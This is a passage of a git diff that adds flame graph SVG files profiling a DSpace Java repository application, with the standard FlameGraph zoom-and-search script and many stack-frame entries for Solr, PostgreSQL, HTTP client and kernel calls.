+<title>__poll (2 samples, 0.96%)</title><rect x="1144.8" y="261" width="11.3" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1147.83" y="271.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.48%)</title><rect x="1060.1" y="341" width="5.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1063.14" y="351.5" ></text>
+</g>
+<g >
+<title>[libjava.so] (1 samples, 0.48%)</title><rect x="501.2" y="245" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="504.20" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/BasicHttpContext:::getAttribute (1 samples, 0.48%)</title><rect x="1111.0" y="293" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1113.96" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/RequestWrapper:::getRequestLine (1 samples, 0.48%)</title><rect x="935.9" y="277" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="938.93" y="287.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (24 samples, 11.48%)</title><rect x="26.9" y="613" width="135.5" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="29.94" y="623.5" >__sched_text_start</text>
+</g>
+<g >
+<title>org/apache/http/client/methods/HttpPost:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="732.7" y="373" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="735.68" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/sort/OrderFormat:::makeSortString (2 samples, 0.96%)</title><rect x="608.5" y="389" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="611.47" y="399.5" ></text>
+</g>
+<g >
+<title>call_stub (2 samples, 0.96%)</title><rect x="1088.4" y="165" width="11.3" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="1091.37" y="175.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.48%)</title><rect x="1071.4" y="213" width="5.7" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="1074.44" y="223.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (5 samples, 2.39%)</title><rect x="484.3" y="325" width="28.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="487.26" y="335.5" >o..</text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.48%)</title><rect x="631.1" y="309" width="5.6" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="634.05" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.96%)</title><rect x="653.6" y="325" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="335.5" ></text>
+</g>
+<g >
+<title>__x64_sys_write (1 samples, 0.48%)</title><rect x="501.2" y="181" width="5.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="504.20" y="191.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedConstructorAccessor19:::newInstance (1 samples, 0.48%)</title><rect x="992.4" y="309" width="5.6" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="995.39" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (7 samples, 3.35%)</title><rect x="873.8" y="309" width="39.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="876.83" y="319.5" >org..</text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.48%)</title><rect x="631.1" y="341" width="5.6" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="634.05" y="351.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg_locked (16 samples, 7.66%)</title><rect x="303.6" y="629" width="90.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="306.59" y="639.5" >tcp_sendms..</text>
+</g>
+</g>
+</svg>
diff --git a/docs/2020/02/out.dspace58-2.svg b/docs/2020/02/out.dspace58-2.svg
new file mode 100644
index 000000000..41eb96220
--- /dev/null
+++ b/docs/2020/02/out.dspace58-2.svg
@@ -0,0 +1,7088 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" width="1200" height="1398" onload="init(evt)" viewBox="0 0 1200 1398" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<!-- Flame graph stack visualization. See https://github.com/brendangregg/FlameGraph for latest version, and http://www.brendangregg.com/flamegraphs.html for examples. -->
+<!-- NOTES:  -->
+<defs>
+	<linearGradient id="background" y1="0" y2="1" x1="0" x2="0" >
+		<stop stop-color="#eeeeee" offset="5%" />
+		<stop stop-color="#eeeeb0" offset="95%" />
+	</linearGradient>
+</defs>
+<style type="text/css">
+	text { font-family:Verdana; font-size:12px; fill:rgb(0,0,0); }
+	#search, #ignorecase { opacity:0.1; cursor:pointer; }
+	#search:hover, #search.show, #ignorecase:hover, #ignorecase.show { opacity:1; }
+	#subtitle { text-anchor:middle; font-color:rgb(160,160,160); }
+	#title { text-anchor:middle; font-size:17px}
+	#unzoom { cursor:pointer; }
+	#frames > *:hover { stroke:black; stroke-width:0.5; cursor:pointer; }
+	.hide { display:none; }
+	.parent { opacity:0.5; }
+</style>
+<script type="text/ecmascript">
+<![CDATA[
+	"use strict";
+	var details, searchbtn, unzoombtn, matchedtxt, svg, searching, currentSearchTerm, ignorecase, ignorecaseBtn;
+	function init(evt) {
+		details = document.getElementById("details").firstChild;
+		searchbtn = document.getElementById("search");
+		ignorecaseBtn = document.getElementById("ignorecase");
+		unzoombtn = document.getElementById("unzoom");
+		matchedtxt = document.getElementById("matched");
+		svg = document.getElementsByTagName("svg")[0];
+		searching = 0;
+		currentSearchTerm = null;
+	}
+
+	window.addEventListener("click", function(e) {
+		var target = find_group(e.target);
+		if (target) {
+			if (target.nodeName == "a") {
+				if (e.ctrlKey === false) return;
+				e.preventDefault();
+			}
+			if (target.classList.contains("parent")) unzoom();
+			zoom(target);
+		}
+		else if (e.target.id == "unzoom") unzoom();
+		else if (e.target.id == "search") search_prompt();
+		else if (e.target.id == "ignorecase") toggle_ignorecase();
+	}, false)
+
+	// mouse-over for info
+	// show
+	window.addEventListener("mouseover", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = "Function: " + g_to_text(target);
+	}, false)
+
+	// clear
+	window.addEventListener("mouseout", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = ' ';
+	}, false)
+
+	// ctrl-F for search
+	window.addEventListener("keydown",function (e) {
+		if (e.keyCode === 114 || (e.ctrlKey && e.keyCode === 70)) {
+			e.preventDefault();
+			search_prompt();
+		}
+	}, false)
+
+	// ctrl-I to toggle case-sensitive search
+	window.addEventListener("keydown",function (e) {
+		if (e.ctrlKey && e.keyCode === 73) {
+			e.preventDefault();
+			toggle_ignorecase();
+		}
+	}, false)
+
+	// functions
+	function find_child(node, selector) {
+		var children = node.querySelectorAll(selector);
+		if (children.length) return children[0];
+		return;
+	}
+	function find_group(node) {
+		var parent = node.parentElement;
+		if (!parent) return;
+		if (parent.id == "frames") return node;
+		return find_group(parent);
+	}
+	function orig_save(e, attr, val) {
+		if (e.attributes["_orig_" + attr] != undefined) return;
+		if (e.attributes[attr] == undefined) return;
+		if (val == undefined) val = e.attributes[attr].value;
+		e.setAttribute("_orig_" + attr, val);
+	}
+	function orig_load(e, attr) {
+		if (e.attributes["_orig_"+attr] == undefined) return;
+		e.attributes[attr].value = e.attributes["_orig_" + attr].value;
+		e.removeAttribute("_orig_"+attr);
+	}
+	function g_to_text(e) {
+		var text = find_child(e, "title").firstChild.nodeValue;
+		return (text)
+	}
+	function g_to_func(e) {
+		var func = g_to_text(e);
+		// if there's any manipulation we want to do to the function
+		// name before it's searched, do it here before returning.
+		return (func);
+	}
+	function update_text(e) {
+		var r = find_child(e, "rect");
+		var t = find_child(e, "text");
+		var w = parseFloat(r.attributes.width.value) -3;
+		var txt = find_child(e, "title").textContent.replace(/\([^(]*\)$/,"");
+		t.attributes.x.value = parseFloat(r.attributes.x.value) + 3;
+
+		// Smaller than this size won't fit anything
+		if (w < 2 * 12 * 0.59) {
+			t.textContent = "";
+			return;
+		}
+
+		t.textContent = txt;
+		// Fit in full text width
+		if (/^ *$/.test(txt) || t.getSubStringLength(0, txt.length) < w)
+			return;
+
+		for (var x = txt.length - 2; x > 0; x--) {
+			if (t.getSubStringLength(0, x + 2) <= w) {
+				t.textContent = txt.substring(0, x) + "..";
+				return;
+			}
+		}
+		t.textContent = "";
+	}
+
+	// zoom
+	function zoom_reset(e) {
+		if (e.attributes != undefined) {
+			orig_load(e, "x");
+			orig_load(e, "width");
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_reset(c[i]);
+		}
+	}
+	function zoom_child(e, x, ratio) {
+		if (e.attributes != undefined) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = (parseFloat(e.attributes.x.value) - x - 10) * ratio + 10;
+				if (e.tagName == "text")
+					e.attributes.x.value = find_child(e.parentNode, "rect[x]").attributes.x.value + 3;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseFloat(e.attributes.width.value) * ratio;
+			}
+		}
+
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_child(c[i], x - 10, ratio);
+		}
+	}
+	function zoom_parent(e) {
+		if (e.attributes) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = 10;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseInt(svg.width.baseVal.value) - (10 * 2);
+			}
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_parent(c[i]);
+		}
+	}
+	function zoom(node) {
+		var attr = find_child(node, "rect").attributes;
+		var width = parseFloat(attr.width.value);
+		var xmin = parseFloat(attr.x.value);
+		var xmax = parseFloat(xmin + width);
+		var ymin = parseFloat(attr.y.value);
+		var ratio = (svg.width.baseVal.value - 2 * 10) / width;
+
+		// XXX: Workaround for JavaScript float issues (fix me)
+		var fudge = 0.0001;
+
+		unzoombtn.classList.remove("hide");
+
+		var el = document.getElementById("frames").children;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var a = find_child(e, "rect").attributes;
+			var ex = parseFloat(a.x.value);
+			var ew = parseFloat(a.width.value);
+			var upstack;
+			// Is it an ancestor
+			if (0 == 0) {
+				upstack = parseFloat(a.y.value) > ymin;
+			} else {
+				upstack = parseFloat(a.y.value) < ymin;
+			}
+			if (upstack) {
+				// Direct ancestor
+				if (ex <= xmin && (ex+ew+fudge) >= xmax) {
+					e.classList.add("parent");
+					zoom_parent(e);
+					update_text(e);
+				}
+				// not in current path
+				else
+					e.classList.add("hide");
+			}
+			// Children maybe
+			else {
+				// no common path
+				if (ex < xmin || ex + fudge >= xmax) {
+					e.classList.add("hide");
+				}
+				else {
+					zoom_child(e, xmin, ratio);
+					update_text(e);
+				}
+			}
+		}
+		search();
+	}
+	function unzoom() {
+		unzoombtn.classList.add("hide");
+		var el = document.getElementById("frames").children;
+		for(var i = 0; i < el.length; i++) {
+			el[i].classList.remove("parent");
+			el[i].classList.remove("hide");
+			zoom_reset(el[i]);
+			update_text(el[i]);
+		}
+		search();
+	}
+
+	// search
+	function toggle_ignorecase() {
+		ignorecase = !ignorecase;
+		if (ignorecase) {
+			ignorecaseBtn.classList.add("show");
+		} else {
+			ignorecaseBtn.classList.remove("show");
+		}
+		reset_search();
+		search();
+	}
+	function reset_search() {
+		var el = document.querySelectorAll("#frames rect");
+		for (var i = 0; i < el.length; i++) {
+			orig_load(el[i], "fill")
+		}
+	}
+	function search_prompt() {
+		if (!searching) {
+			var term = prompt("Enter a search term (regexp " +
+			    "allowed, eg: ^ext4_)"
+			    + (ignorecase ? ", ignoring case" : "")
+			    + "\nPress Ctrl-i to toggle case sensitivity", "");
+			if (term != null) {
+				currentSearchTerm = term;
+				search();
+			}
+		} else {
+			reset_search();
+			searching = 0;
+			currentSearchTerm = null;
+			searchbtn.classList.remove("show");
+			searchbtn.firstChild.nodeValue = "Search"
+			matchedtxt.classList.add("hide");
+			matchedtxt.firstChild.nodeValue = ""
+		}
+	}
+	function search(term) {
+		if (currentSearchTerm === null) return;
+		var term = currentSearchTerm;
+
+		var re = new RegExp(term, ignorecase ? 'i' : '');
+		var el = document.getElementById("frames").children;
+		var matches = new Object();
+		var maxwidth = 0;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var func = g_to_func(e);
+			var rect = find_child(e, "rect");
+			if (func == null || rect == null)
+				continue;
+
+			// Save max width. Only works as we have a root frame
+			var w = parseFloat(rect.attributes.width.value);
+			if (w > maxwidth)
+				maxwidth = w;
+
+			if (func.match(re)) {
+				// highlight
+				var x = parseFloat(rect.attributes.x.value);
+				orig_save(rect, "fill");
+				rect.attributes.fill.value = "rgb(230,0,230)";
+
+				// remember matches
+				if (matches[x] == undefined) {
+					matches[x] = w;
+				} else {
+					if (w > matches[x]) {
+						// overwrite with parent
+						matches[x] = w;
+					}
+				}
+				searching = 1;
+			}
+		}
+		if (!searching)
+			return;
+
+		searchbtn.classList.add("show");
+		searchbtn.firstChild.nodeValue = "Reset Search";
+
+		// calculate percent matched, excluding vertical overlap
+		var count = 0;
+		var lastx = -1;
+		var lastw = 0;
+		var keys = Array();
+		for (k in matches) {
+			if (matches.hasOwnProperty(k))
+				keys.push(k);
+		}
+		// sort the matched frames by their x location
+		// ascending, then width descending
+		keys.sort(function(a, b){
+			return a - b;
+		});
+		// Step through frames saving only the biggest bottom-up frames
+		// thanks to the sort order. This relies on the tree property
+		// where children are always smaller than their parents.
+		var fudge = 0.0001;	// JavaScript floating point
+		for (var k in keys) {
+			var x = parseFloat(keys[k]);
+			var w = matches[keys[k]];
+			if (x >= lastx + lastw - fudge) {
+				count += w;
+				lastx = x;
+				lastw = w;
+			}
+		}
+		// display matched percent
+		matchedtxt.classList.remove("hide");
+		var pct = 100 * count / maxwidth;
+		if (pct != 100) pct = pct.toFixed(1)
+		matchedtxt.firstChild.nodeValue = "Matched: " + pct + "%";
+	}
+]]>
+</script>
+<rect x="0.0" y="0" width="1200.0" height="1398.0" fill="url(#background)"  />
+<text id="title" x="600.00" y="24" >Flame Graph</text>
+<text id="details" x="10.00" y="1381" > </text>
+<text id="unzoom" x="10.00" y="24" class="hide">Reset Zoom</text>
+<text id="search" x="1090.00" y="24" >Search</text>
+<text id="ignorecase" x="1174.00" y="24" >ic</text>
+<text id="matched" x="1090.00" y="1381" > </text>
+<g id="frames">
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="884.8" y="917" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="927.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read_port (1 samples, 0.09%)</title><rect x="790.2" y="613" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="623.5" ></text>
+</g>
+<g >
+<title>refcount_inc_not_zero_checked (1 samples, 0.09%)</title><rect x="244.3" y="757" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="247.28" y="767.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="756.9" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.90" y="959.5" ></text>
+</g>
+<g >
+<title>java/util/Arrays:::copyOf (1 samples, 0.09%)</title><rect x="1057.8" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1060.81" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="789" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedList:::linkFirst (3 samples, 0.27%)</title><rect x="697.8" y="869" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="700.80" y="879.5" ></text>
+</g>
+<g >
+<title>skb_clone (2 samples, 0.18%)</title><rect x="347.4" y="1109" width="2.2" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="350.45" y="1119.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.09%)</title><rect x="132.5" y="1109" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="135.51" y="1119.5" ></text>
+</g>
+<g >
+<title>nf_confirm (1 samples, 0.09%)</title><rect x="344.2" y="1029" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="347.23" y="1039.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="645" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="655.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/BasicHeaderValueParser:::parseElements (1 samples, 0.09%)</title><rect x="1123.4" y="965" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1126.37" y="975.5" ></text>
+</g>
+<g >
+<title>nvme_complete_rq (1 samples, 0.09%)</title><rect x="137.9" y="1061" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="140.89" y="1071.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (39 samples, 3.55%)</title><rect x="423.8" y="949" width="41.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="426.75" y="959.5" >org..</text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (10 samples, 0.91%)</title><rect x="409.8" y="869" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="412.78" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::clearParameters (1 samples, 0.09%)</title><rect x="869.7" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="872.74" y="895.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (13 samples, 1.18%)</title><rect x="116.4" y="1093" width="14.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="119.39" y="1103.5" ></text>
+</g>
+<g >
+<title>bbr_update_model (1 samples, 0.09%)</title><rect x="281.9" y="725" width="1.1" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="284.89" y="735.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (3 samples, 0.27%)</title><rect x="884.8" y="885" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="887.79" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/HttpPoolEntry:::close (1 samples, 0.09%)</title><rect x="559.2" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="562.16" y="911.5" ></text>
+</g>
+<g >
+<title>_itoa_word (1 samples, 0.09%)</title><rect x="12.1" y="1285" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="15.15" y="1295.5" ></text>
+</g>
+<g >
+<title>perf_pmu_disable.part.0 (1 samples, 0.09%)</title><rect x="100.3" y="1061" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="103.27" y="1071.5" ></text>
+</g>
+<g >
+<title>acpi_ev_sci_xrupt_handler (1 samples, 0.09%)</title><rect x="790.2" y="677" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="687.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (1 samples, 0.09%)</title><rect x="436.6" y="613" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="439.65" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="873.0" y="869" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="879.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="755.8" y="853" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="758.83" y="863.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.09%)</title><rect x="807.4" y="869" width="1.1" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="810.41" y="879.5" ></text>
+</g>
+<g >
+<title>acpi_irq (1 samples, 0.09%)</title><rect x="421.6" y="613" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="623.5" ></text>
+</g>
+<g >
+<title>memset_erms (1 samples, 0.09%)</title><rect x="179.8" y="1125" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="182.80" y="1135.5" ></text>
+</g>
+<g >
+<title>inet6_recvmsg (44 samples, 4.01%)</title><rect x="89.5" y="1221" width="47.3" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="92.53" y="1231.5" >inet..</text>
+</g>
+<g >
+<title>link_path_walk.part.0 (1 samples, 0.09%)</title><rect x="11.1" y="1189" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="14.07" y="1199.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource$PoolGuardConnectionWrapper:::prepareStatement (1 samples, 0.09%)</title><rect x="861.1" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="864.15" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="855.8" y="725" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="858.77" y="735.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%)</title><rect x="867.6" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="863.5" ></text>
+</g>
+<g >
+<title>syscall_trace_enter (1 samples, 0.09%)</title><rect x="367.9" y="1269" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="370.87" y="1279.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::flushBuffer (1 samples, 0.09%)</title><rect x="538.7" y="789" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="541.74" y="799.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getID (1 samples, 0.09%)</title><rect x="798.8" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="801.82" y="943.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Proxy:::newProxyInstance (2 samples, 0.18%)</title><rect x="1063.2" y="949" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1066.19" y="959.5" ></text>
+</g>
+<g >
+<title>walk_component (1 samples, 0.09%)</title><rect x="11.1" y="1173" width="1.0" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="14.07" y="1183.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (747 samples, 68.03%)</title><rect x="372.2" y="1173" width="802.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="375.17" y="1183.5" >sun/reflect/DelegatingMethodAccessorImpl:::invoke</text>
+</g>
+<g >
+<title>ip_build_and_send_pkt (1 samples, 0.09%)</title><rect x="1078.2" y="149" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="159.5" ></text>
+</g>
+<g >
+<title>__ip_finish_output (1 samples, 0.09%)</title><rect x="1078.2" y="501" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1081.23" y="511.5" ></text>
+</g>
+<g >
+<title>__libc_recv (55 samples, 5.01%)</title><rect x="83.1" y="1317" width="59.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="86.08" y="1327.5" >__libc..</text>
+</g>
+<g >
+<title>ext4_reserve_inode_write (2 samples, 0.18%)</title><rect x="409.8" y="533" width="2.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="412.78" y="543.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.09%)</title><rect x="535.5" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="538.52" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="873.0" y="805" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1168.5" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1171.51" y="879.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="765.5" y="885" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="768.50" y="895.5" ></text>
+</g>
+<g >
+<title>__wake_up (1 samples, 0.09%)</title><rect x="137.9" y="773" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="140.89" y="783.5" ></text>
+</g>
+<g >
+<title>__x86_indirect_thunk_rax (1 samples, 0.09%)</title><rect x="335.6" y="949" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="338.63" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.09%)</title><rect x="535.5" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="538.52" y="895.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="436.6" y="789" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="439.65" y="799.5" ></text>
+</g>
+<g >
+<title>perf_event_sched_in (1 samples, 0.09%)</title><rect x="116.4" y="1077" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="119.39" y="1087.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (30 samples, 2.73%)</title><rect x="100.3" y="1125" width="32.2" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="103.27" y="1135.5" >__..</text>
+</g>
+<g >
+<title>dev_queue_xmit (7 samples, 0.64%)</title><rect x="336.7" y="997" width="7.5" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="339.70" y="1007.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="542.0" y="741" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="544.97" y="751.5" ></text>
+</g>
+<g >
+<title>syscall_slow_exit_work (1 samples, 0.09%)</title><rect x="411.9" y="725" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="414.93" y="735.5" ></text>
+</g>
+<g >
+<title>deactivate_task (11 samples, 1.00%)</title><rect x="102.4" y="1109" width="11.8" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="105.42" y="1119.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (3 samples, 0.27%)</title><rect x="878.3" y="853" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="863.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="812.8" y="773" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="815.79" y="783.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (2 samples, 0.18%)</title><rect x="1030.9" y="949" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1033.95" y="959.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.09%)</title><rect x="874.0" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="877.04" y="927.5" ></text>
+</g>
+<g >
